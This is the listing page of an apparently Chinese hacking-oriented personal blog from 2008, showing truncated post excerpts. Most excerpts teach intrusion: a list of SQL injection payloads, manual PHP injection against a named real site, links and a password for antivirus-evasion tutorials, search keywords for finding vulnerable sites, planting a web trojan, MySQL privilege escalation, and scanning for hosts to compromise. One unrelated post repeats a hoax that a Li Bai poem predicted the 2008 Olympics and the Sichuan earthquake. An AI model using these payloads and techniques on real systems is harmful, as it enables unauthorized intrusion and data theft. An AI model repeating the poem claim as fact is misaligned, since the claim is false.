情深_B1og

文章列表

关于李白的诗中北京奥运和四川地震的真相

2008-05-29 10:49

关于李白的诗中北京奥运和四川地震的真相
最近很多网友都在转发一下这个内容：

原来在唐朝时李白就知道今天四川地震了，还专为北京奥运和四川地震作诗一首：

北暮苍山兰舟四
京无落霞缀清川
奥年叶落缘分地
运水微漾人却震

前四个字---北京奥运
后四个字---四川地震

阅读全文>>

类别：默认分类 | 评论(2) | 浏览()

PHP注入语句

2008-05-09 13:14

' or 1=1
' or '1=1
'/*
'%23
' and password='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 （ord函数很好用，可以返回整形的）
' and LENGTH(pa

阅读全文>>

类别：黑客技术 | 评论(1) | 浏览()

各站VIP教程

2008-03-28 15:38

这里有很多免杀教程！
都是别的黑客网站VIP教程！
进入后在右面的分类里找！
想办法可以用网际快车之类的软件下载~
PcShare VIP内部免杀教程
http://www.pcshare8.com/exepasskav.rar
http://www.pcshare8.com/syspassrav.rar
VIP内部免杀教程解压缩密码pcsharevip
psvip.rar压缩包解压缩

阅读全文>>

类别：黑客技术 | 评论(0) | 浏览()

php手工注入入侵

2008-03-17 14:32

与asp手工注入大同小异.在猜解的时候.我们可以用工具也可以用手工.原理是一样的.为了方便我们可以使用工具.

1。比如找到一个php注入点:http://xxxxx.sohu.com/xxxx.php?brand_id=1

and 1=1 回显正常,and 1=2 回显与第一页不一样.说明有注入点。

2。进行猜解:http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

注:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* 这就是传说中的 Ascii逐字解码法

我们举个例子，已知表Ad

阅读全文>>

类别：黑客技术 | 评论(0) | 浏览()

挖掘鸡入侵搜索关键词大全

2008-03-17 14:24

默认数据库: Databases/myszw.mdb Databases/myszw1.mdb

上传 upload_Photo.asp?PhotoUrlID=3 upload_Photo.asp?PhotoUrlID=1
----------------------------------------------------
关键字：网站建设公司企业网站管理系统
后缀： admin/login.asp
--------------------

阅读全文>>

类别：黑客技术 | 评论(0) | 浏览()

在百度空间中插入网页木马的方法

2008-03-17 14:21

在百度空间里插入一个框架网页，没有其他办法，毕竟不能编辑自己的空间的html源代码，所以只有靠修改你的空间的html文件所引用的CSS文件来实现了。百度也给客户提供了自己编辑CSS的功能，所以大家的空间都变的丰富多彩起来，通过CSS文件的修改可以实现很多功能，比如鼠标指针样式，插入天气预报，加入QQ连接图标====

现在我来讲一下，如何修改CSS，给你的百度空间里插入一个框架网页的方法，一般可引用的为asp,php,xml类型，据本人严格测试，无法插入htm,html 切记

首先，点『设置』按钮，再点下面的『

阅读全文>>

类别：黑客技术 | 评论(0) | 浏览()

PHP注入基础

2008-03-17 13:45

这些都是最基本的东西，EST的大哥们就不用参合了，呵呵~~~
PHP注入不象ASP那样有NBSI之类的超强工具，其实知道他的注入原理后，完全可以实现手工注入。
在

阅读全文>>

类别：黑客技术 | 评论(0) | 浏览()

实战php手工注入拿webshell

2008-03-17 13:43

目标网站：http://www.atextile.org.cn:81
注入点: http://www.atextile.org.cn:81/news.php?id=780

1.认识注入类型

不管是asp.aspx.php,注入的标准类型必为
http

阅读全文>>

类别：黑客技术 | 评论(0) | 浏览()

PHP主机如何利用MYSQL提权

2008-03-10 15:59

S-serv提权方式人人都会用了，搞得现在的主机都配置得非常安全，看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一，还有其他的pcanywhere获取密码，替换服务，等等。但是现在也没这么好搞了，随着安全意识的提高，之前的方式估计不怎么管用，现在我给大家介绍一下一种新的提权方式，看过古典LM做的那动画的朋友都知道吧？

利用MYSQLl弱口令拿到系统权限，在WEBSHEL上也可实现，不过有个前提，就是目标主机装有MYSQL，而你又知道MYSQL的用户和密码，才可以进行提权。

WEBSHELL获得了，找用户和密码也不

阅读全文>>

类别：黑客技术 | 评论(0) | 浏览()

扫不出端口和抓不到鸡请看

2008-03-10 15:52

很多人说扫不出135端口？这是为什么呢？
注意以下几点基本上可以解决这些问题

1：你要开了这3个服务就可以开通
我的电脑--管理---服务--先开通

TC

阅读全文>>

类别：黑客技术 | 评论(0) | 浏览()